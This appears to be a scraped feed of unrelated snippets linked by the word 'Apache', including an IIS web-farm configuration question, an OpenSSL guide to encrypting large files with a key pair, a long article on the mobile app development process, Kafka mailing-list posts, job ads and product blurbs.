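To illustrate the idea, here is a rough sketch of what I mean in applicationHost.config (farm, server, and path names are made up; assumes ARR and URL Rewrite are installed):

    <webFarms>
      <webFarm name="statefulFarm" enabled="true">
        <server address="tomcat01" enabled="true" />
        <server address="tomcat02" enabled="true" />
        <applicationRequestRouting>
          <affinity useCookie="true" cookieName="ARRAffinity" />
        </applicationRequestRouting>
      </webFarm>
      <webFarm name="statelessFarm" enabled="true">
        <server address="tomcat01" enabled="true" />
        <server address="tomcat02" enabled="true" />
        <!-- no affinity element, so requests are distributed statelessly -->
      </webFarm>
    </webFarms>

with global URL Rewrite rules routing each app context to the matching farm:

    <rule name="StickyApps" stopProcessing="true">
      <match url="^webapp/.*" />
      <action type="Rewrite" url="http://statefulFarm/{R:0}" />
    </rule>
    <rule name="StatelessServices" stopProcessing="true">
      <match url="^services/.*" />
      <action type="Rewrite" url="http://statelessFarm/{R:0}" />
    </rule>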

Any input/assistance would be appreciated.  Best practices, articles, anything!

Thank you.


          Bajaj Pulsar NS 160 vs TVS Apache RTR 160   

So the all-new Bajaj Pulsar NS 160 is close to its launch, and the upcoming Bajaj Pulsar model will soon become the first-ever 160cc motorcycle to go on sale under the Pulsar moniker. Also, from the looks of it, the NS 160 squarely targets the TVS Apache RTR 160. The Apache offers a grunty motor, decent […]

The post Bajaj Pulsar NS 160 vs TVS Apache RTR 160 appeared first on CarBlogIndia.


          My First Web Server "Apache": CentOS 7 Edition (NextPublishing)   
My First Web Server "Apache": CentOS 7 Edition (NextPublishing)
Kindle
大津 真
Impress R&D (2017-05-26)

          Ask.com status page publicly viewable - report   
The search engine operator Ask.com is giving away more information than it should: on an Apache status page, numerous user search queries can be followed. The company has not responded to the error report for a month.
          Quickly Setup A WordPress Testing Environment With InstantWP   
InstantWP is a free tool used to quickly and easily create a WordPress testing environment. It ships with everything you need to get a local install of WordPress up and running. Apache, PHP, MySQL, and WordPress 3.6 are prepackaged. You may be wondering why WordPress 3.6 is installed and not (more...)
          Java J2EE Developers - Technical Integrators (M/F), Technical Expertise - ON-X - Ontario   
KEYWORDS: Java, J2EE. Spring, Hibernate, Struts, Tomcat, Apache, WebServices (Rest, SOAP), JAX, JPA2 (persistence), CDI (context and dependency injection),...
From ON-X - Sun, 02 Apr 2017 07:26:34 GMT - View all Ontario jobs
          ASP   
(Application Service Provider) Hosted software contractor. An ASP operates software at its data center, which customers access online under a service contract. The first wave of ASPs were application outsourcers, who hosted software packages from established enterprise software vendors such as SAP, Peoplesoft and Oracle. They are being superseded by a larger group of 'web-native' or 'net-native' ASPs, who have developed their own software, often using open-source platforms such as Linux, Apache and Perl, specifically for delivery as a hosted service.
          Senior / Principal Java / Scala Engineers - WinterWyman - Burlington, MA   
JSON, REST, SOAP, JDBC, JavaScript, Tomcat, Apache and Linux. Scala, Cloud technologies, Cassandra (or other noSQL technologies), modern Javascript frameworks,... $150,000 a year
From WinterWyman - Mon, 19 Jun 2017 21:41:21 GMT - View all Burlington, MA jobs
          Reggaebomb ft Apache & Crucial Warrior   

https://www.facebook.com/events/212301348964005/?ref_newsfeed_story_type=regular



          ★ Interesting Things You May Have Missed on July 26, 2012   
Explaining what JavaScript is to non-programmers Valuable Java, JavaScript and ADF resources 5 Ways to Secure Your Google Account How to setup Git on Windows Master the basics of Groovy, a general-purpose scripting language that runs on the Java Virtual Machine 8 Mind-Bending Interview Questions That Google Asks Its Engineers Introduction to Apache, the most […]
          Global search   

by Heather P.  

We are on Moodle 3, looking to move to 3.3, on Ubuntu 14.

Upgraded PHP to 5.6.

I've tried to put the Solr server on as per the instructions on the documentation page https://docs.moodle.org/33/en/Global_search#Solr_5.2F6_schema_setup, but I think I'm on a later version of PHP than the one it refers to. I've done my best with it, and it offers up a warning about there being a later version of pecl.

I have extremely limited Ubuntu skills, but I thought I had installed the Solr server; unfortunately, if I have, I don't know where.

I've restarted apache.

In Moodle on the global search plugin page (and I'm currently on a test site/test server) at point 3 it says 'The search engine is not available. Please contact your administrator'.

This leads me to believe that I obviously got something wrong in my solr install / set up.

In the php error log I'm getting

[30-Jun-2017 14:39:01 Europe/London] PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20131226/solr.so' - /usr/lib/php/20131226/solr.so: undefined symbol: php_json_decode_ex in 

The file is there, as opposed to entirely missing. Am I looking at ownership or permissions issues, do you think, or something else?

Any suggestions of where to start to try to get to the bottom of it please.

Thank you 

Heather


          Documentation Improvements for 2.0   

Since Accumulo 1.7, the Accumulo user manual source has resided in the source repository as asciidoc. For every release or update to the manual, an HTML document is produced from the asciidoc, committed to the project website repository, and published to the website. This process will remain for 1.x releases.

For 2.0, the source for the user manual was converted to markdown and moved to the website repository. The upcoming 2.0 documentation has several improvements over the older documentation:

  • Improved navigation using a new sidebar
  • Changes to the documentation are now immediately viewable on the website
  • Better linking to Javadocs and between documentation pages
  • Documentation style now matches the website

While the unreleased documentation is viewable, it is not linked to (except by this post) and every page contains a warning that the documentation is for a future release. Each page also links to the documentation for the latest release.

It is now much easier to view, edit, and propose changes to the documentation. If you would like to contribute to the documentation for 2.0, view the unreleased documentation. Each page has an Edit this page link that will take you to GitHub where you can edit the markdown for the page, preview it, and submit a pull request to the website repository. A committer will review your changes so don’t be afraid to contribute!


          Curl error 60 on DP8 but not DP7 (same setups)   

I just set up a WAMP server and am looking to migrate my DP7 site to DP8

I was getting cURL error 60 on both when doing module installs through /admin/modules/install, so I applied the only solution that anyone ever gives here... https://www.drupal.org/node/2654474

-> Download latest cacert.pem (As txt file) from http://curl.haxx.se/docs/caextract.html
-> Add curl.cainfo = [enter your path]\cacert.pem to your php.ini
-> Restart Apache service
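For reference, the php.ini change from step 2 looks roughly like this (the path is an example; note that some HTTP clients, such as the Guzzle library that Drupal 8 uses, may also consult openssl.cafile, so it may be worth setting both keys):

    ; point both at the downloaded CA bundle - path below is an example
    curl.cainfo = "C:\wamp64\cacert.pem"
    openssl.cafile = "C:\wamp64\cacert.pem"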

Now updates and installs work on the DP7 site but not the DP8 site.

These sites are both in the same wamp64/www folder, using the same PHP, so why does the DP8 one fail? I really feel like there is another step that I just can't find in the forums or actually anywhere...

Any ideas?

Drupal version: 

          Middleware Admin Senior - Capgemini - Sama, Asturias   
Middleware Admin Senior - Asturias. Capgemini. Province: Langreo - Asturias - Spain. Role: JBoss, WebLogic, Apache, and IIS administrator. Languages: English ...
From Capgemini - Fri, 23 Jun 2017 13:17:48 GMT - See all jobs in Sama, Asturias
          Starting a Project with Laravel – Part 1   

Welcome to the series Starting a Project with Laravel. In this first part we will see how to create a project, the main folders in its structure, and how to configure the database.   GENERAL SETTINGS: To get started, we need to configure a few things. Since the focus here is not databases, we will use XAMPP. You can download it here: https://www.apachefriends.org/pt_br/download.html To configure […]
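As a minimal sketch of creating the project itself (assuming Composer is installed; the project name is arbitrary):

    composer create-project laravel/laravel blog
    cd blog
    php artisan serve   # serves the app at http://localhost:8000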

---
This article was written by Tailo Mateus Gonsalves.

Visit our site for more posts about web development! Tableless.


          Sr. Software Engineer - ARCOS LLC - Columbus, OH   
Oracle, PostgreSQL, C, C++, Java, J2EE, JBoss, HTML, JSP, JavaScript, Web services, SOAP, XML, ASP, JSP, PHP, MySQL, Linux, XSLT, AJAX, J2ME, J2SE, Apache,...
From ARCOS LLC - Tue, 13 Jun 2017 17:31:59 GMT - View all Columbus, OH jobs
          Encrypting a large file with a public/private key pair.   

Here is a short procedure for encrypting a large file with the OPENSSL library. Useful if you want to encrypt a large file and share it with someone who will need the key to decrypt and use it.

Create a key pair

For info, the key will be valid for 100000 days ;)

openssl req -x509 -nodes -days 100000 -newkey rsa:2048  -keyout /home/draggi/keys/privKey.pem  -out /home/draggi/keys/pubKey.pem  -subj '/'

Encrypt the large file

Encrypt, for example, a large APACHE LOG file using the public key. (smime encrypts the data with a symmetric AES key and wraps that key with RSA, which is why this works for files far too large for direct RSA encryption.)

openssl  smime  -encrypt -aes256  -in /var/log/apache2/www.draggi.net.access.log.2.gz  -binary  -outform DER  -out www.draggi.net.access.log.2.gz.enc /home/draggi/keys/pubKey.pem

Decrypt the large file.

Decrypt the file using the private key.

openssl  smime -decrypt  -in www.draggi.net.access.log.2.gz.enc  -binary -inform DER -inkey /home/draggi/keys/privKey.pem  -out  www.draggi.net.access.log.2.gz

          Apache Corp   

(A Top Pick April 18/16. Down 8.31%.) He sold this and got about 5.5% from it.


          Comment on How do I setting a proxy for HttpClient? by Wayan Saryada   
Hi Naveen, The example requires the <code>commons-httpclient-3.x.jar</code>. When using Maven, all other dependencies will be downloaded automatically. In this case the <code>DecoderException</code> class is part of the Apache Commons <code>commons-codec-1.2.jar</code>.
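If it helps, the Maven coordinates the reply refers to look roughly like this (versions are illustrative; commons-codec normally arrives transitively with commons-httpclient):

    <dependency>
        <groupId>commons-httpclient</groupId>
        <artifactId>commons-httpclient</artifactId>
        <version>3.1</version>
    </dependency>
    <!-- pulled in transitively, or add it explicitly -->
    <dependency>
        <groupId>commons-codec</groupId>
        <artifactId>commons-codec</artifactId>
        <version>1.2</version>
    </dependency>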
          Comment on How do I setting a proxy for HttpClient? by Naveen   
Hi Wayan Saryada, Which version of the jar should use for this program. I am getting <code>NoClassDefFoundError</code> error. Please suggest me. <pre><code>Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/commons/codec/DecoderException at org.apache.commons.httpclient.HttpMethodBase.<init>(HttpMethodBase.java:217) at org.apache.commons.httpclient.methods.GetMethod.<init>(GetMethod.java:88) at HttpClientTest.main(HttpClientTest.java:19) Caused by: java.lang.ClassNotFoundException: org.apache.commons.codec.DecoderException at java.net.URLClassLoader$1.run(URLClassLoader.java:366) at java.net.URLClassLoader$1.run(URLClassLoader.java:355) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:354) at java.lang.ClassLoader.loadClass(ClassLoader.java:425) at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308) at java.lang.ClassLoader.loadClass(ClassLoader.java:358) ... 3 more </code></pre>
          Latest Security Vulnerabilities   
Latest security vulnerabilities! Please see the bug report. Hello, this is team lead Yang Jung-gyu. The security industry is buzzing again these days because of ransomware. Not only the Petya ransomware but all kinds of cyber threats are on the rise, so please stay alert, and also refer to the latest vulnerability details published by the National Vulnerability Database. Have a happy and healthy day! 1. CVE-2017-5241: An XSS vulnerability in the Name and Description fields of Workspace in Biscom Secure File Transfer 5.1.1015 and earlier, fixed in version 5.1.1025. 2. CVE-2017-7686: A vulnerability in the update notification component of Apache Ignite versions 1.0.0-RC3 through 2.0, which.......
          Mobile App Development Process   

Each day thousands of mobile apps are published to the Google Play and Apple App Stores. Some of these mobile apps are games, others are social networks, and many are ecommerce apps. All of these apps, if professionally built, should follow a similar mobile app development process. At BHW, we have built over 350 web and mobile apps and in this article I will outline the strategy, design, and development processes we follow.

Each app is different and our methodologies are always evolving, but this is a fairly standard process when developing mobile apps. This mobile app development process typically includes idea, strategy, design, development, deployment, and post-launch phases.

Idea

As trite as it sounds, all great apps began as ideas. If you don’t have an app idea, the best place to start is to train yourself to always think of things in terms of problems and potential solutions. You want your brain to instinctively ask “Why do we do things this way?” or “Is there a better way to solve this problem?” If you can identify a problem or market inefficiency, you are half way to your idea!

The next thing to do is understand why this problem exists and think about why nobody else has made an app to solve this problem previously. Talk to others with this problem. Immerse yourself in the problem space as much as possible. Once you have a complete grasp of the problem, begin to evaluate how a mobile app could solve the problem.

This is where having some understanding of what mobile apps can do is extremely valuable. We are frequently asked, “Is this even possible?” Fortunately, the answer is often yes, but it is imperative that this answer is sound. You are about to invest a considerable amount of time and money into an app, now is the time to challenge your idea’s validity and viability.

Strategy

Mobile App Process - Strategy Diagram

Competition

Once you have an idea, you need to plan for your app’s success. One of the best places to start is by identifying your competition. See if any other apps serve a similar purpose and look for the following:

  • Number of installs - See if anyone is using these apps.
  • Ratings and reviews - See if people like these apps and what they like/dislike about them.
  • Company history - See how these apps have changed over time and what sort of challenges they faced along the way. Try to see what they did to grow their user base.

There are two main goals of this process. First, learn as much as you can for free. Making mistakes is time-consuming, frustrating, and expensive. Often, you have to try a few approaches before getting it right. Why not save yourself a few iterations by learning lessons from your competitors? The second is to understand how hard it will be to compete in the marketplace. Are people hungry for a new solution? Is there some niche not being filled by the existing options? Understand what gaps exist and tailor your solution to meet them. If your idea is completely new, find other “first to market” apps and study how they educated consumers about their new product.

Monetization

Unless you just enjoy building apps for their own sake, you are probably hoping to make money on your mobile app. There are several methods of monetization that could work, including: in-app purchases, subscription payments, premium features, ad-revenue, selling user data, and traditional paid apps. To determine which is best for your app, look to see what the market expects to pay and how they expect to pay for similar services. You also need to consider at what point you begin monetizing your app. Far too many apps (particularly startups) skip this step and have a hard time later turning a profit.

Marketing

This step in the mobile app development process is all about identifying the biggest challenges you will face when marketing your app. Assuming you have a reliable app development and app design team, your biggest hurdles will likely be driving app adoption. There are thousands of beautiful and quite useful apps on the app stores that simply go unused. At this point you need to understand what your marketing budget and approach will be. In some cases (like internal-use apps or B2B apps) you might not even need marketing.

Road Map (MVP)

The final stage of the strategy process is defining your app’s roadmap. The goal of this process is to understand what your app could one day become and what it needs to be successful on day one. This day one version is often called your Minimum Viable Product (MVP). During this process, it can be helpful to write on a whiteboard all of the things you want your app to do. Then begin ranking these items by priority. Consider what your app's core functionality will be, what is needed to gain users, and what can be added later. If there are some features you think users might want, they are likely great candidates for later versions. As you gain users with your MVP, you can solicit feedback on what additional features are desired. App monitoring (covered later in this article) can also assist in this process.

User-Experience Design

Mobile App Process - UX Design Diagram

Information Architecture

Information architecture is the process in which you decide what data and functionality needs to be presented within your app and how that data and functionality is organized. Typically, we begin this process by writing down a list of features we want the app to perform and a list of what needs to be displayed somewhere in the app. These are the basic building blocks with which we will build the wireframes.

Tools we use: Whiteboards and Pencil & paper

Wireframes

Next, we begin creating screens and assigning each functions and data. It is ok if some things live in multiple places, but you need to make sure each item has a home. This process often takes place on whiteboards or paper initially. You want to make changes here, rather than later in the process, because it is much cheaper to erase some marks than to rewrite code. Once you have several screens drawn up, begin considering your app’s workflows.

Tools we use: Whiteboards, Pencil & paper, balsamiq, and Sketch

Workflows

Workflows are the pathways users can travel within your app. Consider each of the things you want your users to be able to do and see how many clicks are needed to complete that action. Make sure each click is intuitive. If something takes a few clicks to accomplish, that might be fine, but it should not take a few clicks to perform common tasks. As you find problems with your workflows, update your wireframes and try again. Remember to run through all of your features in each iteration, just to make sure you did not increase the difficulty of one action in an attempt to improve another.

Tools we use: Whiteboards, Pencil & paper, Invision

Click-through models

Click-through models help you test your wireframes and workflows. They are basically a way to experience your wireframes on a phone for more realistic testing. For example, our clients simply receive a link, which when opened on their phone allows them to click through the wireframe. Although the app has no functionality at this point, they can click on each page in the app and begin testing the app’s navigation. As you find issues in this step, make changes with your wireframes and iterate until you are satisfied.

Tools we use: Invision

User-Interface Design

Mobile App Process - UI Design Diagram

Style guides

Style guides are basically the building blocks of your app’s design. Having a sound style guide will help tremendously with your app’s usability. You don’t want your call to action button on one screen to be at the bottom and blue, but green and in the header on another screen. By having a consistent design language, users are more likely to be comfortable within your app.

There is a lot that goes into determining an app’s style guide. You need to consider who you are and who your customers will be. Is your app going to be used at night? Then maybe a dark theme will work best, as to not blind your users. Will it be used mostly by busy employees? Try to keep clutter to a minimum and get your main point across. An experienced designer or design team has a wide range of output and can deliver an app that is a great fit for you and your customers. The output of this phase is a set of colors, fonts, and widgets (buttons, forms, labels, etc.) that will be drawn from in the design of your app.

Rendered designs

Rendered design is the process of taking your wireframes and replacing the grayscale elements with elements from your style guide. There should be a rendered screen for each wireframe screen. Try to stay true to your style guide in this process, but you don’t have to be dogmatic about it. If you find yourself wanting a new or changed style, feel free to update or amend your style guides. Just make sure your design is consistent when this stage is complete.

Tools we use: Whiteboards, Pencil & paper, and Sketch

Rendered Click-through models

Once you have all your screens rendered, return to your click-through model application and test your app again. This is the step in the mobile app development process where you really want to take your time. Although a considerable amount of effort has already gone into the app, after this point changes can become increasingly costly. Think of this as reviewing a floor plan before your home’s concrete is poured. Fortunately, mobile app development is a bit more adaptive than construction, but thinking of it in these terms can be the most cost-effective.

Tools we use: Invision

Design-to-Development Handoff

After having put in so much effort into the form and function of your app, it is imperative that this vision is properly realized by your development team. It always amazes me how often this step in the mobile app development process goes poorly. Perhaps this is due to many organizations and agencies only providing design or development services or the sometimes combative relationship between designers and developers. Whatever the reason, I highly recommend finding a team that can provide both design and development services and can properly handle this step in the process.

Part of what helps ensure a smooth transition and exact implementation is the proper use of the available tools. We like using an application called Zeplin, which helps developers quickly grab style guides for the design. But, this is not foolproof. Zeplin is a great tool, but sometimes its guides are not exact or not the best implementation (it can use explicit dimensions, rather than dynamic ones for example). In those situations, it is immensely beneficial if your developers can also use design applications (such as Sketch or Photoshop). The important thing here is that your team does not simply guess at dimensions, hex values (colors), and positioning. Your design team put in tremendous effort to ensure things were properly aligned and positioned. Your development team’s goal should always be a pixel-perfect implementation.

Tools we use: Zeplin

High-level Technical Design (Tech Stack)

There are numerous approaches, technologies, and programing languages that can be used to build a mobile app. Each with its own strengths and shortcomings. Some might be cheaper to use, but are less performant, whereas others might take longer to implement and be overkill. The worst possibility is building on a dying or unreliable technology stack. If you make this mistake, you might have to rebuild your app or pay a premium for developers moving forward. That is why having a trusted development partner that is seasoned in making these decisions is vital in this process.

Front-end (the mobile app)

For front-end development, there are basically 3 approaches. They are platform-specific native, cross-platform native, and hybrid. Here is a brief overview of each approach and some articles that delve into each with greater details.

  • Platform-specific Native - Apps built with this approach are written separately for each mobile platform. Code can’t be reused between Android and iOS, but these apps can be fully optimized for each platform. The UI can look entirely native (so it will fit in with the OS) and the app should work fluidly. This is often the most expensive approach, but is very tried and tested.

  • Cross-platform Native - Apps built with this approach share some (or all) of their code, but still run natively. Common technologies used for this are React Native, Xamarin, and NativeScript. This is a nice middle ground between the various approaches in that it is more cost-effective, but can still be optimized and styled for each platform.

  • Hybrid - Hybrid apps are built using web technologies (HTML, CSS, Javascript) and are installed via a native wrapper. This can be done using technologies such as Cordova, Phone Gap, and Ionic. This option can be the cheapest, but also presents some very real difficulties.

Back-end (Web API & Server)

The server is responsible for much of your app’s performance and scalability. The technologies used here are similar to those used to power web-based applications. Here are a few things you have to decide before writing code:

  • Language - There are dozens of languages that can be used to build your API. Common languages used are Java, C#, Go-lang, javascript, PHP, and Python. Most languages also have numerous frameworks that can be utilized.

  • Database - There are two main types of modern databases. SQL and noSQL. SQL is more traditional and the best choice in almost all cases. Common SQL implementations include MSSQL, MYSQL, and PostgreSQL. In addition to selecting a database engine, you have to design your particular database schema. Having reliable and well organized data is crucial to your long term success. So, make sure this is well thought out.

  • Hosting Environment (Infrastructure) - In this step you need to decide where and how your API and database will be hosted. Decisions made here will help determine the hosting costs, scalability, performance, and reliability of your application. Common hosting providers include Amazon AWS and Rackspace. Beyond picking a provider, you need to plan how your system will scale as your user base grows. Cloud-based solutions allow you to pay for resources as a utility and scale up and down as needed. They also help with database backups, server uptime, and operating system updates.

Development & Iteration

Mobile App Process - Development Diagram

Sound mobile app development is an iterative process. You have likely heard the term “sprints” or “agile methodology”. This basically means that you break up all development work into smaller milestones and build your app in a series of cycles. Each cycle will include planning, development, testing, and review. There are entire books written on this process, so this article will just provide a brief overview of each step. If your company elects to use another process, these steps will be quite similar, but the order and length of each might vary.

Planning

The planning phase of a sprint involves dividing up the list of tasks to be implemented during the current iteration. Each task needs clearly defined requirements. Once these requirements are understood by developers, they will often estimate the time needed to complete each task, so that the tasks can be evenly distributed to ensure a balanced workload during the sprint.

Developers also begin planning their approach to solving their assigned problems during this phase. Skilled software developers find ways to intelligently reuse code throughout an application. This is especially important for implementing styles and shared functionality. If a design needs to be changed (believe me, something will change), you don’t want to have to go and update code in numerous places. Instead, well designed software can be changed in select places to make these sorts of sweeping changes.

Development

During the development phase your development team will begin implementing the styles and functionality of your app. As they are completed, they are assigned back to a project manager or QA tester for review. Good project managers are able to fully optimize developer workloads during this process by properly redistributing assignments throughout the sprint.

It is important that your development team fully understand the goals of the application as a whole and for the specific feature they are working on. Nobody is more in-tune with that particular feature than the assigned developer. They should understand the intent of the requirements. If something starts to not make sense, it is often developers who will be the first to let you know.

During development, we use a platform called Hockey App. It allows us to privately and securely distribute the in-development version of the app to testers, clients, and other developers. Hockey automatically notifies users of new builds (so everyone is testing the latest & greatest), provides crash reporting, and can ensure only approved testers have access to your app. It is a great way to keep everyone up to speed on progress. During development, we try to update Hockey once or twice a week.

Testing

Most testing should be performed by non-developers or at least people who are not your app’s primary developer. This will help ensure a more genuine testing experience. There are several types of testing that should occur during each sprint. These typically include the following:

  • Functional Testing - Testing to ensure the feature works as described in the requirements. Usually, a QA team will have a test plan with a list of actions and the desired app behavior.

  • Usability Testing - Testing to ensure the feature is user-friendly and is as intuitive as possible. Often it is helpful to bring in new testers for a “first-use” experience during this step.

  • Performance Testing - Your app might work perfectly, but if it takes 20 seconds to display a simple list, nobody is going to use it. Performance testing is typically more important in later sprints, but keep an eye on the app’s responsiveness as you move along.

  • Fit and Finish Testing - Just because the design phase is past doesn't mean you can lock your designers in a closet. Designers should review each feature and ensure that their vision was implemented as described in the design. This is another reason why having one agency for both design and development is so beneficial.

  • Regression Testing - Remember that one feature from the previous sprint? Don’t assume it still works, just because you tested it last month. Good QA teams will have a list of tests to perform at the end of each sprint, which will include tests from previous sprints.

  • Device-Specific Testing - There are tens of thousands of device and operating system combinations in the world. When testing, make sure you try out your app on numerous screen sizes and OS versions. There are tools that can help automate this, such as Google’s Firebase, but always test the app on at least a handful of physical devices.

  • User Acceptance Testing - This is testing performed by either the app owner or future app users. Remember who you are building this app for and get their feedback throughout the process. If a feature passes all the above tests, but fails this one, what use is it?

As problems are discovered in this phase, reassign tasks back to developers so that the problems can be resolved and the issues closed out. Once testing has been completed and each task is done, move on to review.

Review

At the end of each sprint talk with each of the stakeholders and determine how the sprint went. If there were difficulties, try to eliminate similar issues from future sprints. If things went well in one area, try to apply them elsewhere. No two projects are the exact same and everyone should always be advancing in their roles, so aim to improve, while you iterate. Once review is complete, begin again with the planning phase and repeat this process until the app is done!

Extended Review

At this point your app should be fully testable and feature complete (at least for the MVP). Before you spend a sizable amount of time and money on marketing, take the time to test your app with a sample of your potential users. There are two main ways to go about this.

Focus Groups

Focus groups involve conducting an interview with a tester or group of testers who have never seen the app before. You want to understand who these testers are, how they learn about new apps, and if they use similar apps already. Try to get some background info out of them before even getting into your product. Next, let your testers begin using your app. They should not be coached during this process. Instead, let them use the app as if they had just found it in the app store. See how they use the app, and look for common frustrations. After they are done using the app, get their feedback. Remember to not be too strongly guided by any one tester, but combine feedback and make intelligent decisions using all available feedback.

Beta Testing

In addition to, or instead of focus groups, you can do a beta launch of your app. Beta tests involve getting a group of testers to use your app in the real world. They use the app just as if it had launched, but in much smaller numbers. Often these beta testers will be power users, early adopters, and possibly your best customers. Make sure they feel valued and respected. Give them ample opportunities to provide feedback and let them know when and how you are changing the app. Also, beta testing is a great time to see how your app performs on various devices, locations, operating systems, and network conditions. It is imperative that you have sound crash reporting for this step. It does you no good if something goes wrong but is not discovered and diagnosed.

Refinement

After these extended review periods, it is common to have a final development sprint to address any newly discovered issues. Continue beta testing during this process and ensure that your crash and issue reports are declining. Once you have the all-clear from your testers, it is time to begin preparing for deployment.

Deployment

Mobile App Process - Deployment Diagram

There are two main components to deploying your mobile app into the world. The first involves deploying your web server (API) into a production environment that is scalable. The second is deploying your app to the Google Play Store and Apple App Store.

Web API (Server)

Most mobile apps require a server back-end to function. These web servers are responsible for transferring data to and from the app. If your server is overloaded or stops working, the app will stop working. Properly configured servers are scalable to meet your current and potential user base, while not being needlessly expensive. This is where the “cloud” comes in. If your server is deployed to a scalable environment (Amazon Web Services, RackSpace, etc.), then it should be able to better handle spikes in traffic. It is not terribly difficult to scale for most mobile apps, but you want to ensure your team knows what they are doing or your app could fall apart, just when it gets popular.

App Stores

Submitting your apps to the app stores is a moderately involved process. You need to make sure your apps are properly configured for release, fill out several forms for each store, submit screenshots and marketing materials, and write a description. Additionally, Apple manually reviews all apps submitted to their app store. It is possible they will request you make changes to your app to better comply with their regulations. Often, you can discuss these changes with Apple and get them to accept your app as-is. Other times, you might have to make changes to be granted entrance. Once your app is submitted, it will be live in Google later that day and in Apple within a few days, assuming everything goes smoothly.

Monitoring

Mobile App Process - Monitoring Diagram

It would be incredibly naive to think that the mobile app development process ends when the app is shipped. Go look at any even moderately popular app and you will see a long history of updates. These updates include fixes, performance improvements, changes, and new features. Thorough monitoring is essential to best understand what sort of updates are needed. Here are a few things you should be monitoring.

Crashes

There are numerous libraries that can be used to reliably track app crashes. These libraries include information about what the user was doing, what device they were on, and plenty of technical info that is crucial for your development team in resolving the problem. Apps can be configured to send an email/text/alert when crashes occur. These crashes can be viewed and triaged accordingly.

Tools we use: Sentry and HockeyApp

Analytics

Modern app analytics systems are a treasure trove of information. They can help you understand who is using your apps (age, gender, location, language, etc.) and how they are using it (time of day, time spent in app, screens viewed in app, etc.). Some even allow you to view heat maps of your app, so you know what buttons on each screen are clicked most often. These systems provide an invaluable glimpse into how your app is being used. Use this information to best understand where to invest future efforts. Don’t build onto portions of the app that are seldom utilized, but invest where there is action and the largest potential for growth.

Tools we use: Facebook Analytics, Apptentive, Google Analytics, and Appsee

Performance

One vital metric not covered by the previous two monitoring categories is your app's technical performance, i.e., how quickly it works. Any system we deploy has extensive performance monitoring in place. We are able to track how many times an action occurred and how long that action took. We use this to find areas ripe for optimization. We also put alerts in place to let us know if a particular action is slower than expected, so we can quickly look to see if there are any issues. These performance tools typically have dash-boarding, reporting, and alerting functionality included.

Tools we use: Prometheus
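As a rough illustration of this kind of instrumentation, here is a sketch using the Prometheus Java simpleclient (the metric names and the checkout action are hypothetical, not our actual setup):

    import io.prometheus.client.Counter;
    import io.prometheus.client.Histogram;
    import io.prometheus.client.exporter.HTTPServer;

    public class CheckoutMetrics {
        // how many times the action occurred
        static final Counter CALLS = Counter.build()
            .name("checkout_calls_total").help("Checkout invocations").register();
        // how long the action took, as a histogram for alerting on slowness
        static final Histogram LATENCY = Histogram.build()
            .name("checkout_latency_seconds").help("Checkout duration").register();

        static void checkout() throws InterruptedException {
            CALLS.inc();
            Histogram.Timer timer = LATENCY.startTimer();
            try {
                Thread.sleep(50); // stand-in for the real work
            } finally {
                timer.observeDuration();
            }
        }

        public static void main(String[] args) throws Exception {
            new HTTPServer(9100); // exposes /metrics for Prometheus to scrape
            while (true) checkout();
        }
    }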

App Store Management

App store ratings and reviews are extremely important, particularly for newer apps. Whenever a new review is left on your listing, make sure to engage the reviewer. Thank users who give you great reviews and try to assist those who were frustrated. I have seen hundreds of poor reviews changed to 5-stars just with a little customer service. Users don’t expect app developers and owners to provide a hands-on level of service and that help goes a long way in boosting your online reputation.

Further Iteration and Improvement

The purpose of all this monitoring is to know what you need to do next. Most apps are never really done. There are always new features that can be added and things that can be improved upon. It would be incredibly wasteful to blindly build on your app. Use the information you have received from your users and your monitoring platforms. Then repeat parts of this mobile app development process (don’t worry, many steps are much easier after the first pass). Continue to improve your app, your conversion rates, your install base, and of course your revenue. Mobile apps are fluid. Take advantage of that by continuing to grow and improve.

Conclusion

The mobile app development process might seem overwhelming and involved. There are a lot of steps and difficult decision making is required along the way. But, it is an extremely rewarding process and can be quite lucrative. Also, there might be some temptation to skips steps in this process, but this guide is built upon years of experience working with app owners that chose to skip certain steps.

If you are looking to build your next (or first) mobile app and need help with one or more of these steps, you’re in luck! The BHW Group welcomes app owners at any stage in this process. Whether you are a startup or Fortune 50 company, we have the team and knowledge needed to deliver a fantastic mobile app. Please don’t hesitate to contact us today.


          Automation Engineer - Marin Software - San Francisco, CA   
AngularJS, Hadoop, Hive, Presto, HBase, Apache Phoenix, Pig and Kafka. Out with the manual testing, in with the 100% automated testing and the continuous...
From Marin Software - Tue, 13 Jun 2017 18:37:50 GMT - View all San Francisco, CA jobs
          Technical Quality Engineer Lead - Marin Software - San Francisco, CA   
Understand the business and key drivers for success. JS Angular, Hadoop, HBase, Hive, Presto, HBase, Apache Phoenix, Spark, Scala, Pig and Kafka....
From Marin Software - Mon, 15 May 2017 22:30:30 GMT - View all San Francisco, CA jobs
          [Kafka-users] Fail to build examples with gradle on Kafka using JDK 8 (Philippe Derome)   
The issue had apparently existed and is apparently resolved, but so far it does not work for me: https://issues.apache.org/jira/browse/KAFKA-2203. I issue same command as Stevo Slavic with JDK ... -- Philippe Derome
          [Kafka-users] General Question About Kafka (Ali)   
Hello Guys. We are going to install Apache Kafka in our local data center and different producers which are distributed across different locations will be connected to this server. Our Producers will ... -- Ali
          [Kafka-users] Please include me in kafka users group (Srikanth Hugar)   
Hi, I started working on Apache Kafka and want to be included in users group. Please include me. Thank you. Best Regards, Srikanth. -- Srikanth Hugar
          [Kafka-users] Kafka controller replica state docs outdated? (Stevo Slavić)   
Hello Apache Kafka community, Is it intentional that not all states (like ReplicaDeletionIneligible) are documented on https://cwiki.apache.org/confluence/display/KAFKA/Kafka+Controller+Internals or ... -- Stevo Slavić
          Deep learning on Apache Spark and Apache Hadoop with Deeplearning4j   
爱可可-爱生活 (web edition) 2017-06-29 19:55. Tags: architecture, lessons learned, deep learning, Hadoop. Nish […]
          Apache Tonto Holds the Fort   
After four years in Butjadingen, Capitano Ol has finally repaired his ship, the Santa Maria. Now he is on his way to Brazil, where ...
          Amazon Prime Day UK July 11   
https://www.amazon.co.uk/gp/b/ref=pe_3460351_200032281_pe_btn/?node=10157705031 Also in the US. https://www.amazon.com/Prime-Day/b?ie=UTF8&node=13887280011 Apache
          Comments on WordPress Master 3: Installing and Setting Up WordPress with Amir   
